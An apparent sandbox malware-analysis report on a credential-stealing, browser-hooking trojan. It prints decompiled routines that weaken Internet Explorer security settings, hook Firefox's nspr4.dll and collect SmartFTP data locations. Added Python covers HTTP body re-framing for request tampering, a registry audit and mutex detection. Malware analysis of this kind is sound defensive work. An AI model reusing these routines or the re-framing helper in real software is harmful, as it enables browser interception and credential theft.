                0x004149b2
                0x004149b4
                0x004149b9
                0x004149be
                0x00414c08
                0x00414c08
                0x00414c0a
                0x00414c0f
                0x00414c0f
                0x00414c15
                0x00414c1c
                0x00414c1d
                0x00000000
                0x00414c1d
                0x004149c4
                0x004149ca
                0x004149f0
                0x004149f3
                0x004149f9
                0x004149ff
                0x00414a0c
                0x00414a11
                0x00414a11
                0x00414a1e
                0x00414a23
                0x00414a2a
                0x00414a4e
                0x00414a53
                0x00414a5a
                0x00414a7a
                0x00414a87
                0x00414a8b
                0x00414a8f
                0x00414a95
                0x00414aa0
                0x00414aa2
                0x00414aa8
                0x00414ab7
                0x00414ac1
                0x00414ac2
                0x00414afe
                0x00414b1e
                0x00414b23
                0x00414b28
                0x00414b28
                0x00414ac4
                0x00414ac4
                0x00414acb
                0x00414acd
                0x00414ada
                0x00414add
                0x00414ae9
                0x00414aec
                0x00414af1
                0x00414af5
                0x00414af5
                0x00414b2a
                0x00414b31
                0x00414b46
                0x00414b46
                0x00414b4b
                0x00414b50
                0x00414b56
                0x00414b59
                0x00414b59
                0x00414aa8
                0x00414a95
                0x00414b60
                0x00414b65
                0x00414b65
                0x00414b6a
                0x00414b6a
                0x00414b75
                0x00414b8c
                0x00414b8c
                0x00414b99
                0x00414b9f
                0x00414ba5
                0x00414bab
                0x00414bae
                0x00414bb1
                0x00414bb4
                0x00414bb9
                0x00414bbd
                0x00414bc0
                0x00000000
                0x00414bc0
                0x00414b8e
                0x00414b93
                0x00000000
                0x00000000
                0x00000000
                0x00414b77
                0x00414b7b
                0x00414b88
                0x00000000
                0x00414b88
                0x00414b7d
                0x00414b7e
                0x00000000
                0x00414b7e
                0x00414b75
                0x004149cc
                0x004149d5
                0x004149da
                0x004149dc
                0x004149e6
                0x00000000
                0x004149ec
                0x004149ec
                0x00000000
                0x004149ec
                0x004149e6

                APIs
                  • Part of subcall function 00407B30: WaitForSingleObject.KERNEL32(000000FF,004034D2), ref: 00407B38
                  • Part of subcall function 00407B3F: WaitForSingleObject.KERNEL32(00000000,004157E2,19367400,00000001), ref: 00407B47
                • EnterCriticalSection.KERNEL32(0041AC38), ref: 00414960
                • LeaveCriticalSection.KERNEL32(0041AC38), ref: 0041498E
                • EnterCriticalSection.KERNEL32(0041AC38), ref: 004149B2
                • LeaveCriticalSection.KERNEL32(0041AC38,00000000,?,?), ref: 00414BFE
                • LeaveCriticalSection.KERNEL32(0041AC38), ref: 00414C1D
                  • Part of subcall function 0040FE63: StrCmpNIA.SHLWAPI(?,?,?,?,?), ref: 0040FEBD
                  • Part of subcall function 004097F7: HeapFree.KERNEL32(00000000,00000000,0040F4F2,00000000,?,?,?,?,00407564,00000000,00407832), ref: 0040980A
                • LeaveCriticalSection.KERNEL32(0041AC38), ref: 00414C2A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: CriticalSection$Leave$EnterObjectSingleWait$FreeHeap
                • String ID: 0$%x$Content-Length
                • API String ID: 197861008-3838797520
                • Opcode ID: cb774bb6b26966c6faf7806a6d635503f0b2aae53758b7aa508304f46053c982
                • Instruction ID: 50d63c3ca1dd5c6796bca38f05d1307c0062cb0d226f1c9c44c6a92a87ef72d5
                • Opcode Fuzzy Hash: cb774bb6b26966c6faf7806a6d635503f0b2aae53758b7aa508304f46053c982
                • Instruction Fuzzy Hash: 7391B072504206AFC710EF25CD8199ABBB5FF84314F05462FF850A72A2D738E995CBDA
                Uniqueness

                Uniqueness Score: -1.00%
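
                The string constants in E0041491F (Content-Length, "%x\r\n", "\r\n0\r\n\r\n") together with the two branches on (_v32 & 2) are consistent with rewriting a buffered HTTP message so that a replaced body stays well-formed: one branch patches the Content-Length header through E0040FE63 (whose subcall uses StrCmpNIA, a case-insensitive compare), the other writes the body as a single hex-sized chunk followed by the zero-length terminator chunk. The Python below is an added example of that re-encoding and is not code from the sample; that the flag bit means "chunked transfer encoding", the header handling details, and the sample messages are all constructed assumptions.

```python
"""Re-encode a modified HTTP body in the two ways the strings in E0041491F suggest.

Added example for this report; not code from the analysed sample. Mode selection
(Content-Length fix-up vs. chunked) is keyed off the Transfer-Encoding header here,
which is an assumption about what the (_v32 & 2) test in the sample represents.
"""
import re

CHUNK_TERMINATOR = b"\r\n0\r\n\r\n"  # literal present in the sample


def split_message(raw: bytes) -> tuple[bytes, bytes]:
    """Split an HTTP message into (headers including the blank line, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no header terminator found")
    return head + sep, body


def is_chunked(headers: bytes) -> bool:
    return re.search(rb"(?im)^transfer-encoding:\s*chunked\s*$", headers) is not None


def set_content_length(headers: bytes, length: int) -> bytes:
    """Replace an existing Content-Length (case-insensitively) or append one before the blank line."""
    new = b"Content-Length: %d\r\n" % length
    headers, n = re.subn(rb"(?im)^content-length:[^\r\n]*\r\n", new, headers, count=1)
    if n == 0:
        headers = headers[:-2] + new + b"\r\n"
    return headers


def encode_chunk(body: bytes) -> bytes:
    """One chunk: hex size line ('%x\\r\\n'), the data, then '\\r\\n0\\r\\n\\r\\n' as the last chunk."""
    return b"%x\r\n" % len(body) + body + CHUNK_TERMINATOR


def rewrite(raw: bytes, new_body: bytes) -> bytes:
    """Return raw with its body replaced by new_body and the framing kept consistent."""
    headers, _old_body = split_message(raw)
    if is_chunked(headers):
        return headers + encode_chunk(new_body)
    return set_content_length(headers, len(new_body)) + new_body


def decode_chunked(body: bytes) -> bytes:
    """Minimal chunked decoder, used to confirm that encode_chunk output round-trips."""
    out = b""
    pos = 0
    while True:
        line_end = body.index(b"\r\n", pos)
        size = int(body[pos:line_end], 16)
        pos = line_end + 2
        if size == 0:
            return out
        out += body[pos:pos + size]
        pos += size + 2  # skip the data and its trailing CRLF


if __name__ == "__main__":
    # Constructed sample request, not captured traffic.
    req = b"POST /login HTTP/1.1\r\nHost: example.test\r\nContent-Length: 8\r\n\r\nuser=abc"
    print(rewrite(req, b"user=abc&pw=secret").decode())
    chunked = b"POST /x HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n3\r\nabc\r\n0\r\n\r\n"
    print(rewrite(chunked, b"hello world"))
```

                The point of the two modes is the one visible in the decompiled code: a sender that alters the body of an in-flight request must either correct Content-Length or re-chunk, otherwise the peer reads a truncated or over-long body. A network detection that looks for this behaviour can compare the Content-Length a process claims against what the browser originally produced.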

                C-Code - Quality: 87%
                			E00412E18(void* __ecx) {
                				void* __edi;
                				void* _t22;
                				void* _t31;
                				void* _t33;
                				void* _t35;
                				void* _t36;
                				intOrPtr* _t38;
                				char* _t44;
                				intOrPtr* _t46;
                				void* _t48;
                				void* _t50;
                
                				_t33 = __ecx;
                				_t48 = _t50 - 0x78;
                				 *0x41aa50 =  *0x41aa50 & 0x00000000;
                				 *0x41aa54 =  *0x41aa54 & 0x00000000;
                				InitializeCriticalSection(0x41aa38);
                				if( *0x41953c > 1) {
                					 *(_t48 + 0x6c) = L"Enabled";
                					 *(_t48 + 0x70) = L"EnabledV8";
                					_t38 = _t48 + 0x6c;
                					 *(_t48 + 0x74) = 2;
                					_t44 = L"Software\\Microsoft\\Internet Explorer\\PhishingFilter";
                					do {
                						_t30 =  *_t38;
                						if(E0040EDD3(_t33, 0x80000001, _t44,  *_t38) != 0) {
                							E0040EE08(_t33, _t44, _t30);
                						}
                						_t38 = _t38 + 4;
                						_t6 = _t48 + 0x74;
                						 *_t6 =  *(_t48 + 0x74) - 1;
                					} while ( *_t6 != 0);
                					_t39 = L"CleanCookies";
                					_t45 = L"Software\\Microsoft\\Internet Explorer\\Privacy";
                					if(E0040EF91(_t33, L"Software\\Microsoft\\Internet Explorer\\Privacy", L"CleanCookies") == 0 || E0040EDD3(_t33, 0x80000001, L"Software\\Microsoft\\Internet Explorer\\Privacy", L"CleanCookies") != 0) {
                						_t25 = E0040EE08(_t33, _t45, _t39);
                					}
                					 *(_t48 + 0x74) =  *(_t48 + 0x74) & 0x00000000;
                					 *(_t48 + 0x64) = L"1406";
                					 *(_t48 + 0x68) = L"1609";
                					 *(_t48 + 0x70) = 5;
                					do {
                						_push( *(_t48 + 0x74));
                						_push(L"Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%u");
                						_t36 = 0x64;
                						_t25 = E0040A4B7(_t25, _t36, _t48 - 0x64);
                						_pop(_t35);
                						if(_t25 > 0) {
                							_t46 = _t48 + 0x64;
                							_t31 = 2;
                							do {
                								_t42 =  *_t46;
                								if(E0040EDD3(_t35, 0x80000001, _t48 - 0x64,  *_t46) != 0) {
                									_t25 = E0040EE08(_t35, _t48 - 0x64, _t42);
                								}
                								_t46 = _t46 + 4;
                								_t31 = _t31 - 1;
                							} while (_t31 != 0);
                						}
                						 *(_t48 + 0x74) =  *(_t48 + 0x74) + 1;
                						_t20 = _t48 + 0x70;
                						 *_t20 =  *(_t48 + 0x70) - 1;
                					} while ( *_t20 != 0);
                				}
                				return _t22;
                			}

                0x00412e18
                0x00412e19
                0x00412e1d
                0x00412e24
                0x00412e36
                0x00412e43
                0x00412e4c
                0x00412e53
                0x00412e5a
                0x00412e5d
                0x00412e64
                0x00412e69
                0x00412e69
                0x00412e79
                0x00412e7d
                0x00412e7d
                0x00412e82
                0x00412e85
                0x00412e85
                0x00412e85
                0x00412e8a
                0x00412e90
                0x00412e9d
                0x00412eb1
                0x00412eb1
                0x00412eb6
                0x00412eba
                0x00412ec1
                0x00412ec8
                0x00412ecf
                0x00412ecf
                0x00412ed5
                0x00412edc
                0x00412edd
                0x00412ee3
                0x00412ee6
                0x00412eea
                0x00412eed
                0x00412eee
                0x00412eee
                0x00412f01
                0x00412f08
                0x00412f08
                0x00412f0d
                0x00412f10
                0x00412f10
                0x00412eee
                0x00412f13
                0x00412f16
                0x00412f16
                0x00412f16
                0x00412f1d
                0x00412f22

                APIs
                • InitializeCriticalSection.KERNEL32(0041AA38), ref: 00412E36
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: CriticalInitializeSection
                • String ID: 1406$1609$CleanCookies$Enabled$EnabledV8$Software\Microsoft\Internet Explorer\PhishingFilter$Software\Microsoft\Internet Explorer\Privacy$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u
                • API String ID: 32694325-4107750306
                • Opcode ID: e47ad1eb5c21e99592cd26efc98c3e4ce707b4a887cff478ca2cc4c52bb62aca
                • Instruction ID: d3bc6e4e3f7ff92af8898704777a4757e3176350e20910faba814a2f13eb1bf7
                • Opcode Fuzzy Hash: e47ad1eb5c21e99592cd26efc98c3e4ce707b4a887cff478ca2cc4c52bb62aca
                • Instruction Fuzzy Hash: 332152725053086AEB209F62DE09BDF37A8EF41354F24443BFD04B61D2D3B89965CBA8
                Uniqueness

                Uniqueness Score: -1.00%
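
                E00412E18 walks three sets of values under HKEY_CURRENT_USER (the 0x80000001 passed to E0040EDD3): Enabled and EnabledV8 under Internet Explorer\PhishingFilter, CleanCookies under Internet Explorer\Privacy, and 1406 and 1609 under Internet Settings\Zones\0 through Zones\4 (the %u counter runs from 0 while the loop counter at _t48+0x70 starts at 5). 1406 and 1609 are the URL actions URLACTION_CROSS_DOMAIN_DATA (0x1406) and URLACTION_HTML_MIXED_CONTENT (0x1609). The page does not resolve what E0040EE08 does to each value it is handed. The Python below is an added example, not the sample's code: it lists exactly those targets and audits a constructed registry snapshot for ones that are absent. Treating absence as an indicator of tampering, and the snapshot format, are assumptions.

```python
"""List the IE registry values E00412E18 touches and audit a snapshot for them.

Added example for this report; not code from the analysed sample. The snapshot is a
plain dict (e.g. built from a 'reg export' parse) and the audit only reports values
that are missing; what E0040EE08 does to each value is not resolved on the page.
"""
from __future__ import annotations

HKCU = 0x80000001  # hive constant used by the decompiled code

IE = r"Software\Microsoft\Internet Explorer"
ZONES = r"Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u"


def targeted_values() -> list[tuple[int, str, str]]:
    """(hive, subkey, value) triples in the order the decompiled loops visit them."""
    targets = [(HKCU, IE + r"\PhishingFilter", v) for v in ("Enabled", "EnabledV8")]
    targets.append((HKCU, IE + r"\Privacy", "CleanCookies"))
    # Zones\%u is formatted for zone 0..4; 1406 = cross-domain data, 1609 = mixed content.
    for zone in range(5):
        for v in ("1406", "1609"):
            targets.append((HKCU, ZONES.replace("%u", str(zone)), v))
    return targets


def audit(snapshot: dict[str, dict[str, object]]) -> list[str]:
    """Return 'subkey\\value' strings for targeted values that the snapshot does not contain.

    snapshot maps a subkey path to {value name: data}. Matching is case-insensitive
    because registry key and value names are.
    """
    lowered = {k.lower(): {vn.lower() for vn in vals} for k, vals in snapshot.items()}
    missing = []
    for _hive, subkey, value in targeted_values():
        if value.lower() not in lowered.get(subkey.lower(), set()):
            missing.append(subkey + "\\" + value)
    return missing


if __name__ == "__main__":
    # Constructed snapshot: only some of the targeted values are present.
    snap = {
        IE + r"\PhishingFilter": {"EnabledV8": 1},
        IE + r"\Privacy": {"CleanCookies": 0},
        ZONES.replace("%u", "3"): {"1406": 3, "1609": 1},
    }
    for entry in audit(snap):
        print("missing:", entry)
```

                On a live host the snapshot would be filled from HKCU of the affected user; because the decompiled loops address HKEY_CURRENT_USER, the values have to be checked per user profile, not once per machine.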

                C-Code - Quality: 93%
                			E0040926B(void* __ecx, void* __edx, void* __eflags) {
                				intOrPtr _v8;
                				intOrPtr _v12;
                				void* _v16;
                				void* _v20;
                				void* _v24;
                				intOrPtr _v28;
                				char _v92;
                				void* __ebx;
                				void* __edi;
                				intOrPtr _t22;
                				void* _t25;
                				long _t27;
                				void* _t28;
                				long _t29;
                				void* _t33;
                				void* _t37;
                				void* _t39;
                				void* _t42;
                				void* _t45;
                				void* _t52;
                				void* _t57;
                				void* _t62;
                				void* _t70;
                				WCHAR* _t74;
                				void* _t75;
                				void* _t79;
                				void* _t80;
                
                				_t70 = __edx;
                				_t64 = __ecx;
                				_t22 = E00407A11(__ecx, 0x743c1521, 2);
                				_v28 = _t22;
                				if(_t22 != 0) {
                					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
                					_t25 = E00407B3F();
                					__eflags = _t25;
                					if(_t25 == 0) {
                						L24:
                						E0040DD1D(_v28);
                						__eflags = 0;
                						return 0;
                					}
                					_t27 = WaitForSingleObject( *0x419798, 0xea60);
                					__eflags = _t27 - 0x102;
                					if(_t27 != 0x102) {
                						goto L24;
                					}
                					do {
                						_t28 = E00413D6A(_t64);
                						_v24 = _t28;
                						__eflags = _t28;
                						if(__eflags == 0) {
                							goto L22;
                						}
                						_t62 = E00410520( &_v16, _t70, __eflags, _t28, 2, 0x20000000);
                						_v20 = _t62;
                						__eflags = _t62;
                						if(__eflags == 0) {
                							L21:
                							E004097F7(_v20);
                							E004097F7(_v24);
                							goto L22;
                						}
                						_t64 = _v16;
                						_t33 = E00408FA7(_v16, __eflags, _t62);
                						__eflags = _t33;
                						if(_t33 == 0) {
                							goto L21;
                						} else {
                							goto L8;
                						}
                						do {
                							L8:
                							_v8 = E0040A6CE(_t62, 1);
                							_v12 = E0040A6CE(_t62, 2);
                							_t37 = E0040B855(_t62, E0040A398(_t62));
                							_t68 = _v8;
                							_t39 = E0040B855(_t68, E0040A398(_v8));
                							_t69 = _v12;
                							_push(E0040B855(_t69, E0040A398(_v12)));
                							_push(_t39);
                							_push(_t37);
                							_push(L"Global\\%08X%08X%08X");
                							_t70 = 0x20;
                							_t74 =  &_v92;
                							_t42 = E0040A4B7(_t41, _t70, _t74);
                							_t80 = _t80 + 0x10;
                							__eflags = _t42 - 0x1f;
                							if(_t42 != 0x1f) {
                								goto L20;
                							}
                							_t45 = CreateMutexW(0x41930c, 1, _t74);
                							__eflags = _t45;
                							if(_t45 == 0) {
                								_t79 = 0;
                								__eflags = 0;
                							} else {
                								_t79 = E0040DD2D(_t45);
                							}
                							__eflags = _t79;
                							if(_t79 != 0) {
                								_t75 = HeapAlloc( *0x41a570, 8, 0x14); // 8 = HEAP_ZERO_MEMORY; 0x14-byte context handed to the worker thread
                								__eflags = _t75;
                								if(_t75 == 0) {
                									L19:
                									E0040DD1D(_t79);
                									goto L20;
                								}
                								 *_t75 = E00409B94(_t46 | 0xffffffff, _t62);
                								 *(_t75 + 4) = E00409B94(_t48 | 0xffffffff, _v8);
                								_t52 = E00409B94(_t50 | 0xffffffff, _v12);
                								__eflags =  *_t75;
                								 *(_t75 + 8) = _t52;
                								 *(_t75 + 0xc) = _t79;
                								if( *_t75 == 0) {
                									L18:
                									E004097F7( *_t75);
                									E004097F7( *(_t75 + 4));
                									E004097F7( *(_t75 + 8));
                									E004097F7(_t75);
                									goto L19;
                								}
                								__eflags =  *(_t75 + 4);
                								if( *(_t75 + 4) == 0) {
                									goto L18;
                								}
                								__eflags = _t52;
                								if(_t52 == 0) {
                									goto L18;
                								}
                								_t57 = E0040F70A(0x80000, E004090AC, _t75); // thread wrapper (also used by E00411226): 0x80000-byte stack, routine E004090AC, parameter _t75
                								__eflags = _t57;
                								if(_t57 > 0) {
                									goto L20;
                								}
                								goto L18;
                							}
                							L20:
                							_t64 = _t62;
                							_t62 = E0040A6CE(_t62, 3);
                							__eflags = _t62;
                						} while (_t62 != 0);
                						goto L21;
                						L22:
                						_t29 = WaitForSingleObject( *0x419798, 0xea60); // global handle at 0x419798, 0xea60 = 60 000 ms
                						__eflags = _t29 - 0x102;
                					} while (_t29 == 0x102);
                					goto L24;
                				}
                				return _t22 + 1;
                			}

                Decompiled-line addresses: 0x0040926b to 0x00409461

                APIs
                  • Part of subcall function 00407A11: CreateMutexW.KERNEL32(0041930C,00000000,?,?,?,?,?), ref: 00407A32
                • GetCurrentThread.KERNEL32 ref: 0040928C
                • SetThreadPriority.KERNEL32(00000000), ref: 00409293
                • WaitForSingleObject.KERNEL32(0000EA60), ref: 004092B1
                • CreateMutexW.KERNEL32(0041930C,00000001,?,20000000), ref: 00409374
                • HeapAlloc.KERNEL32(00000008,00000014), ref: 0040939B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: CreateMutexThread$AllocCurrentHeapObjectPrioritySingleWait
                • String ID: Global\%08X%08X%08X
                • API String ID: 1505615485-3239447729
                • Opcode ID: 53148d1c98e7002fb7277b3481fb64a50876eb2f5bf37401b559759476b61ff8
                • Instruction ID: f99632d8d91a63277727bfec5330b48c91110177e8c9455d41db4f9cc3ae37aa
                • Opcode Fuzzy Hash: 53148d1c98e7002fb7277b3481fb64a50876eb2f5bf37401b559759476b61ff8
                • Instruction Fuzzy Hash: 1841B071A00301B6DB107FB28C8ABAF766AAF44714F10453BF951B62E3DF7D8C518A69
                Uniqueness

                Uniqueness Score: -1.00%
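The routine above names each per-entry mutex with L"Global\\%08X%08X%08X" and only goes on when the formatted name is exactly 0x1f characters long, so every such mutex is "Global\" followed by 24 uppercase hex digits. The Python below is an added triage helper, not part of the report or of the sample: it scans a handle listing in the style of Sysinternals handle.exe (the listing here is constructed; the process names, PIDs and mutex names are invented) for mutants whose leaf name has that shape and splits the name back into its three 32-bit words. Because Global\ resolves into \BaseNamedObjects, the check is applied to the last path component.

```python
import re
from typing import List, NamedTuple, Optional, Tuple

# The decompiled routine formats L"Global\\%08X%08X%08X" and requires the result to be
# 0x1f (31) characters: 7 for "Global\" plus three 8-digit uppercase hex fields.
MUTEX_FMT_PREFIX = "Global\\"
MUTEX_HEX_DIGITS = 24
MUTEX_NAME_LEN = len(MUTEX_FMT_PREFIX) + MUTEX_HEX_DIGITS   # 31 == 0x1f in the code
HEX24 = re.compile(r"[0-9A-F]{24}")                          # %08X emits uppercase only

# Constructed handle listing in the style of `handle.exe -a`; every entry is invented.
SAMPLE_HANDLE_LISTING = """\
explorer.exe pid: 1234 DESKTOP\\alice
   1C: Mutant        \\Sessions\\1\\BaseNamedObjects\\ExplorerIsShellMutex
svchost.exe pid: 2088 NT AUTHORITY\\SYSTEM
   2A: Mutant        \\BaseNamedObjects\\1A2B3C4DDEADBEEF0BADF00D
   2B: Mutant        \\BaseNamedObjects\\1a2b3c4ddeadbeef0badf00d
   2C: Mutant        \\BaseNamedObjects\\1A2B3C4DDEADBEEF0BADF00
   2D: Mutant        \\BaseNamedObjects\\MSCTF.Shared.MUTEX.ABC
"""


def mutex_words(name: str) -> Optional[Tuple[int, int, int]]:
    """Return the three 32-bit words if `name` has the Global\\%08X%08X%08X shape, else None.

    Accepts the Win32 form ("Global\\<hex>") and the object-manager form that handle
    listings show ("\\BaseNamedObjects\\<hex>"): Global\\ is a link to \\BaseNamedObjects,
    so only the last path component carries the name.
    """
    leaf = name.rsplit("\\", 1)[-1]
    if not HEX24.fullmatch(leaf):
        return None
    return tuple(int(leaf[i:i + 8], 16) for i in range(0, MUTEX_HEX_DIGITS, 8))


class Hit(NamedTuple):
    process: str
    pid: int
    name: str
    words: Tuple[int, int, int]


PROC_LINE = re.compile(r"^(\S+)\s+pid:\s+(\d+)")
MUTANT_LINE = re.compile(r"^\s+[0-9A-Fa-f]+:\s+Mutant\s+(\S+)")


def find_candidate_mutexes(listing: str) -> List[Hit]:
    """Walk a handle listing and report mutants whose name matches the sample's pattern."""
    hits: List[Hit] = []
    process, pid = "", 0
    for line in listing.splitlines():
        m = PROC_LINE.match(line)
        if m:
            process, pid = m.group(1), int(m.group(2))
            continue
        m = MUTANT_LINE.match(line)
        if not m:
            continue
        words = mutex_words(m.group(1))
        if words is not None:
            hits.append(Hit(process, pid, m.group(1), words))
    return hits


if __name__ == "__main__":
    for hit in find_candidate_mutexes(SAMPLE_HANDLE_LISTING):
        print(f"{hit.process} ({hit.pid}): {hit.name} -> "
              + " ".join(f"{w:08X}" for w in hit.words))
```

A 24-hex-digit object name is a weak indicator on its own, since other software also uses hex-only names, so treat a hit as a lead to corroborate with the Yara match and the other behaviours listed in this report rather than as a verdict.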

                C-Code - Quality: 100%
                			E00407219(void* __edx, void* __eflags) {
                				intOrPtr _v8;
                				char _v12;
                				char _v532;
                				short _v1052;
                				void* __edi;
                				void* __esi;
                				void* _t15;
                				void* _t16;
                				void* _t32;
                				WCHAR* _t34;
                				WCHAR* _t35;
                
                				_t32 = __edx;
                				E004098AA( &_v12,  &_v12, 0, 8);
                				_t34 =  &_v532;
                				_t15 = E0040ED7B(0x104, _t34, 0x80000001, L"SOFTWARE\\smartftp\\client 2.0\\settings\\general\\favorites", L"personal favorites"); // 0x104 = MAX_PATH, 0x80000001 = HKEY_CURRENT_USER; E0040ED7B reads a string value (-1 on error, 0 if empty)
                				if(_t15 != 0xffffffff && _t15 > 0) {
                					ExpandEnvironmentStringsW(_t34,  &_v1052, 0x104);
                					E00406F9D( &_v1052,  &_v12);
                				}
                				_t35 =  &_v532;
                				_t16 = E0040ED7B(0x104, _t35, 0x80000001, L"SOFTWARE\\smartftp\\client 2.0\\settings\\backup", L"folder");
                				if(_t16 != 0xffffffff && _t16 > 0) {
                					ExpandEnvironmentStringsW(_t35,  &_v1052, 0x104);
                					_t16 = E00406F9D( &_v1052,  &_v12);
                				}
                				_t41 = _v8;
                				if(_v8 > 0) {
                					E00412508(_t16, _v12, _t32, _t41, L"SmartFTP"); // hand the collected locations (_v12/_v8, filled by E00406F9D) on under the label "SmartFTP"
                				}
                				return E004097F7(_v12);
                			}

                Decompiled-line addresses: 0x00407219 to 0x004072d9

                APIs
                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,80000001,SOFTWARE\smartftp\client 2.0\settings\general\favorites,personal favorites,?,00000000,00000008), ref: 00407266
                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,80000001,SOFTWARE\smartftp\client 2.0\settings\backup,folder,80000001,SOFTWARE\smartftp\client 2.0\settings\general\favorites,personal favorites,?,00000000,00000008), ref: 004072A5
                Strings
                • folder, xrefs: 0040727B
                • SOFTWARE\smartftp\client 2.0\settings\general\favorites, xrefs: 00407237
                • personal favorites, xrefs: 00407232
                • SOFTWARE\smartftp\client 2.0\settings\backup, xrefs: 00407280
                • SmartFTP, xrefs: 004072C3
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: EnvironmentExpandStrings
                • String ID: SOFTWARE\smartftp\client 2.0\settings\backup$SOFTWARE\smartftp\client 2.0\settings\general\favorites$SmartFTP$folder$personal favorites
                • API String ID: 237503144-2826361158
                • Opcode ID: 8f68b3936625bcc1834525d7a8d200a2e019c488f776878786ecb5cfe990f983
                • Instruction ID: 31394ff3ad001db7313ea6a7fbe22de9aa86fe32beee15327d4f061efbd570aa
                • Opcode Fuzzy Hash: 8f68b3936625bcc1834525d7a8d200a2e019c488f776878786ecb5cfe990f983
                • Instruction Fuzzy Hash: 0011B271A4010C7ACB20AAA5CC85FCF767CAF04714F1005BBB615F31D1DA786AC58AA8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 84%
                			E00403615(WCHAR* _a4, long _a8, UNICODE_STRING* _a12, HMODULE* _a16) {
                				void* __edi;
                				void* _t13;
                				long _t14;
                				void* _t17;
                				void* _t18;
                				void* _t22;
                				void* _t23;
                				void* _t24;
                				UNICODE_STRING* _t25;
                				void* _t29;
                				HMODULE* _t30;
                				struct _OBJDIR_INFORMATION _t32;
                
                				E00407B30();
                				if(E00407B3F() != 0) {
                					_t30 = _a16;
                					_t25 = _a12;
                					_t13 =  *0x419308(_a4, 0, _t25, _t30, _t24, _t29, _t18); // call through 0x419308 = LdrGetDllHandle: was the DLL already loaded?
                					_t14 = LdrLoadDll(_a4, _a8, _t25, _t30); // the actual load
                					_a4 = _t14;
                					if(_t13 < 0 && _t14 >= 0 && _t30 != 0 &&  *_t30 != 0 && _t25 != 0) { // only on a module's first successful load, with a name and an out-handle
                						EnterCriticalSection(0x419188);
                						if(( *0x4191a0 & 0x00000001) == 0) { // bit 0 of 0x4191a0: nspr4 already handled
                							_t32 =  *_t30;
                							if(lstrcmpiW( *(_t25 + 4), L"nspr4.dll") != 0) { // Firefox's NSPR library: E00404DB1 instruments it (see E0041415B for the PR_* exports it resolves)
                								_t17 = 0;
                							} else {
                								_t17 = E00404DB1(_t22, _t23, _t32);
                							}
                							if(_t17 != 0) {
                								 *0x4191a0 =  *0x4191a0 | 0x00000001;
                							}
                						}
                						LeaveCriticalSection(0x419188);
                					}
                					return _a4;
                				}
                				goto ( *0x419304); // not initialised yet: tail-jump through the pointer saved at 0x419304
                			}

                Decompiled-line addresses: 0x00403618 to 0x004036b9

                APIs
                  • Part of subcall function 00407B30: WaitForSingleObject.KERNEL32(000000FF,004034D2), ref: 00407B38
                  • Part of subcall function 00407B3F: WaitForSingleObject.KERNEL32(00000000,004157E2,19367400,00000001), ref: 00407B47
                • LdrGetDllHandle.NTDLL(?,00000000,?,?), ref: 0040363D
                • LdrLoadDll.NTDLL(?,?,?,?), ref: 0040364D
                • EnterCriticalSection.KERNEL32(00419188), ref: 00403671
                • lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 0040368B
                • LeaveCriticalSection.KERNEL32(00419188), ref: 004036AC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: CriticalObjectSectionSingleWait$EnterHandleLeaveLoadlstrcmpi
                • String ID: @xw$nspr4.dll
                • API String ID: 535701974-1669710511
                • Opcode ID: e958c34da4d3ad7947392385f9e0a547d5d3dc5dcb466b0fe9d4daec3a24187f
                • Instruction ID: 68fc0d21d15f602f6fd9813450dd037956c2be53508a7386fdd631dfb32fcecd
                • Opcode Fuzzy Hash: e958c34da4d3ad7947392385f9e0a547d5d3dc5dcb466b0fe9d4daec3a24187f
                • Instruction Fuzzy Hash: EB11B231100205BBDB205F519D68A9B3FACEF85756F04487AFD05773A1C73A9E81CA98
                Uniqueness

                Uniqueness Score: -1.00%

